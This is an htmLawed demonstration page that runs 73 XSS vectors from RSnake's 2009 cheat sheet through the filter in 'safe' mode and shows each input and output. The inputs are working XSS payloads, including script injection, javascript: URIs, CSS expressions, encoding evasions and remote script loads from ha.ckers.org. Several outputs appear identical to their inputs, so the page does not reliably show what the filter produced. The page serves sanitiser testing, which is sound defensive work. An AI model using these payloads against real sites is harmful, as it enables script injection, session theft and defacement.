To illustrate the anti-XSS'ing efficiency of htmLawed in 'safe' mode,
htmLawed was used to filter text for each of the XSS vector (code)
listed on
RSnake's XSS cheat sheet (31 January 2009; an
updated version may be available ).
For each vector, the code is shown for both before and after
the filtering. Most vectors obviously designed to exploit HTML markup in
the
<head> section or in <frame>,
<noframe>, or <frameset> elements of
web-pages, or those targeting non-HTML content such as Flash movies,
PHP interpreters, etc., were not considered as those are outside
htmLawed's purview. How htmLawed neutralizes text (e.g., '>' can be
removed or converted to an HTML entity) can vary depending on the
settings used.
The 'safe' mode means that the $config parameter 'safe' is set
to 1, and other parameters to over-ride any of the default parameter
values implicitly used because of 'safe' are not specified.
In such cases,
'safe'=>1
is thus equivalent to the following in a $config value:
'comments'=>0,
'cdata'=>0, 'deny_attribute'=>'on*',
elements'=>'* -applet -audio -canvas -embed -iframe -object -script -video',
'schemes'=>'href: aim, feed, file, ftp, gopher, http, https, irc, mailto, news, nntp, sftp, ssh, tel, telnet; style: !; *:file, http, https'
Refer to
htmLawed documentation for more about $config.
Note: Security concerns when filtering HTML are defined by many parameters, like trust in a user, or an admin.'s requirement. htmLawed is an HTML filter/processor,
and not an anti-XSS tool per se. For instance, just the presence of Javascript code or dynamic CSS expressions in HTML does not mean that the HTML is dangerous. htmLawed certainly can be used with the right settings to remove such HTML code as is shown in the examples below. On this site you can also find more
test-cases with XSS or bad HTML code, as well as an htmLawed
demo page.
There is also a demo page to
test just the anti-XSS ability of htmLawed (in
safe mode, with
style attribute denied).
1.
XSS Locator About »Category: Basic XSS Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Output code »';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
2.
XSS Quick Test About »Category: Basic XSS Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »'';!--"<XSS>=&{()}
Output code »'';!--"<XSS>=&{()}
3.
SCRIPT w/Alert() About »Category: Basic XSS Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT>alert('XSS')</SCRIPT>
Output code »<SCRIPT>alert('XSS')</SCRIPT>
4.
SCRIPT w/Source File About »Category: Basic XSS Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Output code »<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
5.
SCRIPT w/Char Code About »Category: Basic XSS Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Output code »<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
6.
DIV background-image 1 About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Output code »<div style="background-image: url(denied:javascript:alert('XSS'))"></div>
7.
DIV background-image 2 About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Output code »<div style="background-image: url(denied:&#1;javascript:alert('XSS'))"></div>
8.
DIV expression About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<DIV STYLE="width: expression(alert('XSS'));">
Output code »<div style="width: (alert('XSS'));"></div>
9.
IFRAME About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
Output code »<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
10.
INPUT Image About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
Output code »<input type="image" src="denied:javascript:alert('XSS');" />
11.
IMG w/JavaScript Directive About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="javascript:alert('XSS');">
Output code »<img src="denied:javascript:alert('XSS');" alt="image" />
12.
IMG No Quotes/Semicolon About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC=javascript:alert('XSS')>
Output code »<img src="denied:javascript:alert(" alt="image" />
13.
IMG Dynsrc About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG DYNSRC="javascript:alert('XSS');">
Output code »<img src="src" alt="image" />
14.
IMG Lowsrc About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG LOWSRC="javascript:alert('XSS');">
Output code »<img src="src" alt="image" />
15.
IMG Embedded commands 1 About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Output code »<img src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" alt="image" />
16.
IMG Embedded commands 2 About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
Output code »Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
17.
IMG STYLE w/expression About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »exp/*<XSS STYLE='no\xss:noxss("*//*");¬
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
Output code »exp/*<XSS STYLE='no\xss:noxss("*//*");¬
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
18.
IMG w/VBscript About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC='vbscript:msgbox("XSS")'>
Output code »<img src="denied:vbscript:msgbox("XSS")" alt="image" />
19.
LAYER About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54] [NS4]
Input code »<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
Output code »<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
20.
Livescript About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54] [NS4]
Input code »<IMG SRC="livescript:[code]">
Output code »<img src="denied:livescript:[code]" alt="image" />
*21.
US-ASCII encoding About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54] [NS4]
Input code »%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
Output code »%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
22.
Mocha About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54] [NS4]
Input code »<IMG SRC="mocha:[code]">
Output code »<img src="denied:mocha:[code]" alt="image" />
23.
OBJECT About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
Output code »<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
24.
OBJECT w/Embedded XSS About »Category: HTML Element Attacks
Browser support:
Input code »<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
Output code »<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name="url" value="javascript:alert(" /></OBJECT>
25.
Embed Flash About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
Output code »<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
*26.
OBJECT w/Flash 2 About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";¬
eval(a+b+c+d);
Output code »a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";¬
eval(a+b+c+d);
27.
STYLE About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54] [NS4]
Input code »<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
Output code »<style type="text/javascript" scoped="scoped">alert('XSS');</style>
28.
STYLE w/Comment About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
Output code »<img style="xss:expr XSS*/ession(alert('XSS'))" src="src" alt="image" />
29.
STYLE w/Anonymous HTML About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<XSS STYLE="xss:expression(alert('XSS'))">
Output code »<XSS STYLE="xss:expression(alert('XSS'))">
30.
TABLE About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
Output code »<table></table>
31.
TD About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
Output code »<table><td></td></table>
32.
XML namespace About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<HTML xmlns:xss>¬
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">¬
<xss:xss>XSS</xss:xss>¬
</HTML>
Output code »<HTML xmlns:xss>¬
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">¬
<xss:xss>XSS</xss:xss>¬
</HTML>
33.
XML data island w/CDATA About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>¬
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
Output code »<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>¬
</C></X></xml><span></span>
34.
XML data island w/comment About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>¬
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
Output code »<XML ID="xss"><i><b><img src="src" alt="image" />cript:alert('XSS')"></b></i></XML>¬
<span></span>
35.
XML (locally hosted) About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>¬
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
Output code »<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>¬
<span></span>
36.
XML HTML+TIME About »Category: HTML Element Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<HTML><BODY>¬
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">¬
<?import namespace="t" implementation="#default#time2">¬
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
Output code »<HTML><BODY>¬
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">¬
<?import namespace="t" implementation="#default#time2">¬
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
37.
Commented-out Block About »Category: Other Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<!--[if gte IE 4]>¬
<SCRIPT>alert('XSS');</SCRIPT>¬
<![endif]-->
Output code »<!--[if gte IE 4]>¬
<SCRIPT>alert('XSS');</SCRIPT>¬
<![endif]-->
38.
Rename .js to .jpg About »Category: Other Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
Output code »<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
39.
SSI About »Category: Other Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
Output code »<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
40.
PHP About »Category: Other Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<? echo('<SCR)';¬
echo('IPT>alert("XSS")</SCRIPT>'); ?>
Output code »<? echo('<SCR)';¬
echo('IPT>alert("XSS")</SCRIPT>'); ?>
41.
JavaScript Includes About »Category: Other Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54] [NS4]
Input code »<BR SIZE="&{alert('XSS')}">
Output code »<br />
42.
Case Insensitive About »Category: Character Encoding Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC=JaVaScRiPt:alert('XSS')>
Output code »<img src="denied:JaVaScRiPt:alert(" alt="image" />
43.
HTML Entities About »Category: Character Encoding Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC=javascript:alert("XSS")>
Output code »<img src="denied:javascript:alert("XSS")" alt="image" />
44.
Grave Accents About »Category: Character Encoding Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
Output code »<img src="denied:`javascript:alert(" alt="image" />
45.
Image w/CharCode About »Category: Character Encoding Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Output code »<img src="denied:javascript:alert(String.fromCharCode(88,83,83))" alt="image" />
46.
UTF-8 Unicode Encoding About »Category: Character Encoding Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC=javascript:alert('XSS')>
Output code »<img src="denied:javascript:alert('XSS')"
alt="image" />
47.
Long UTF-8 Unicode w/out Semicolons About »Category: Character Encoding Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG
SRC=javascript:alert('XSS')>
Output code »<img src="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041"
alt="image" />
48.
DIV w/Unicode About »Category: Character Encoding Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<DIV
STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
Output code »<div
style="background-image: 075 072 06C 028' 06a 061 076 061 073 063 072
069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029'
029"></div>
49.
Hex Encoding w/out Semicolons About »Category: Character Encoding Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG
SRC=javascript:alert('XSS')>
Output code »<img src="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29"
alt="image" />
50.
Embedded Tab About »Category: Embedded Character Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="jav ascript:alert('XSS');">
Output code »<img src="denied:jav ascript:alert('XSS');" alt="image" />
51.
Embedded Encoded Tab About »Category: Embedded Character Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="jav	ascript:alert('XSS');">
Output code »<img src="denied:jav	ascript:alert('XSS');" alt="image" />
52.
Embedded Newline About »Category: Embedded Character Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="jav
ascript:alert('XSS');">
Output code »<img src="denied:jav
ascript:alert('XSS');" alt="image" />
53.
Embedded Carriage Return About »Category: Embedded Character Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="jav
ascript:alert('XSS');">
Output code »<img src="denied:jav
ascript:alert('XSS');" alt="image" />
54.
Multiline w/Carriage Returns About »Category: Embedded Character Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG¬
SRC¬
=¬
"¬
j¬
a¬
v¬
a¬
s¬
c¬
r¬
i¬
p¬
t¬
:¬
a¬
l¬
e¬
r¬
t¬
(¬
'¬
X¬
S¬
S¬
'¬
)¬
"¬
>
Output code »<img src="denied:j a v a s c r i p t : a l e r t ( ' X S S ' )" alt="image" />
55.
Spaces/Meta Chars About »Category: Embedded Character Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="  javascript:alert('XSS');">
Output code »<img src="denied:&#14; javascript:alert('XSS');" alt="image" />
56.
Non-Alpha/Non-Digit About »Category: Embedded Character Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
57.
Non-Alpha/Non-Digit Part 2 About »Category: Embedded Character Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Output code »<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
58.
No Closing Script Tag About »Category: Embedded Character Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT SRC=http://ha.ckers.org/xss.js
Output code »<SCRIPT SRC=http://ha.ckers.org/xss.js
59.
Protocol resolution in script tags About »Category: Embedded Character Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT SRC=//ha.ckers.org/.j>
Output code »<SCRIPT SRC=//ha.ckers.org/.j>
60.
Half-Open HTML/JavaScript About »Category: Embedded Character Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG SRC="javascript:alert('XSS')"
Output code »<IMG SRC="javascript:alert('XSS')"
61.
Double open angle brackets About »Category: Embedded Character Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
Output code »<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
62.
Extraneous Open Brackets About »Category: Embedded Character Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<<SCRIPT>alert("XSS");//<</SCRIPT>
Output code »<<SCRIPT>alert("XSS");//<</SCRIPT>
63.
Malformed IMG Tags About »Category: Embedded Character Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Output code »<img src="src" alt="image" /><SCRIPT>alert("XSS")</SCRIPT>">
64.
No Quotes/Semicolons About »Category: Embedded Character Attacks
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT>a=/XSS/¬
alert(a.source)</SCRIPT>
Output code »<SCRIPT>a=/XSS/¬
alert(a.source)</SCRIPT>
65.
Evade Regex Filter 1 About »Category: XSS w/HTML Quote Encapsulation
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
66.
Evade Regex Filter 2 About »Category: XSS w/HTML Quote Encapsulation
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
67.
Evade Regex Filter 3 About »Category: XSS w/HTML Quote Encapsulation
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
68.
Evade Regex Filter 4 About »Category: XSS w/HTML Quote Encapsulation
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
69.
Evade Regex Filter 5 About »Category: XSS w/HTML Quote Encapsulation
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
70.
Filter Evasion 1 About »Category: XSS w/HTML Quote Encapsulation
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
71.
Filter Evasion 2 About »Category: XSS w/HTML Quote Encapsulation
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
Output code »<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
72.
Mixed Encoding About »Category: URL Obfuscation
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<A HREF="h¬
tt p://6	6.000146.0x7.147/">XSS</A>
Output code »<a href="denied:h tt p://6	6.000146.0x7.147/">XSS</a>
73.
JavaScript Link Location About »Category: URL Obfuscation
Browser support: [IE6.0|NS8.1-IE] [NS8.1-G|FF1.5] [O8.54]
Input code »<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Output code »<a href="denied:javascript:document.location='http://www.google.com/'">XSS</a>